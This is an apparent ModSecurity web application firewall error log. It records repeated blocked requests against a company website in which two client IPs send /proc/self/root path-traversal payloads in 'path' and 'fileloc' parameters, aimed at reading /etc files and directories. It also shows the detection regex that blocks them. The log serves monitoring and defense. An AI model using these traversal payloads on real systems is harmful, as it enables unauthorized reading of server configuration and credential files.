"abk7NxePVOt35XCGZP8nzgAAA4c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:30:21.002349 2026] [:error] [pid 1210:tid 140411599251200] [client 74.7.243.203:59716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7TVKJy4A1bGlmj9BOFAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:30:23.538000 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.241.46:40632] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7T5DEJR9VXonE_-1GegAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:30:27.109838 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.241.46:49980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7U-82sZHvlq4xgHq7rAAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:30:32.606844 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.241.46:33662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7WAQohV2v-7oj5HHzPQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:30:46.015904 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.241.46:33678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7ZgQohV2v-7oj5HHzWQAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:30:49.608654 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.241.46:39846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7aZDEJR9VXonE_-1GgQAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:30:52.635517 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:41236] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7bFKJy4A1bGlmj9BOGQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:30:54.971127 2026] [:error] [pid 1961:tid 140411574073088] [client 74.7.241.46:41252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7bXRXaaWotPICgYsdoQAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:30:58.415540 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.241.46:41264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7cpDEJR9VXonE_-1GhAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:06.115277 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:56006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7eu82sZHvlq4xgHq71AAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:07.437188 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.243.203:47450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7e3RXaaWotPICgYsdpgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:08.739450 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:47462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7fJqmL8PQht4WJFlBFgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:10.036466 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:47470] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7fgeiSKl8TjouI-b63AAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:10.256102 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:54438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7fpDEJR9VXonE_-1GkAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:11.349755 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.203:38632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7fweiSKl8TjouI-b63QAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:12.645877 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:38634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7gAeiSKl8TjouI-b63wAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:13.967572 2026] [:error] [pid 1210:tid 140411557287680] [client 74.7.243.203:38638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7gVKJy4A1bGlmj9BOHgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:17.420218 2026] [:error] [pid 1210:tid 140411683178240] [client 74.7.243.203:38650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7hVKJy4A1bGlmj9BOJAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:18.693920 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.243.203:38660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7hgQohV2v-7oj5HHzaAAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:19.885952 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:38662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7h9CmCSWTlPouqorD3gAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:21.230827 2026] [:error] [pid 2305:tid 140411674785536] [client 74.7.243.203:55800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7iQQohV2v-7oj5HHzaQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
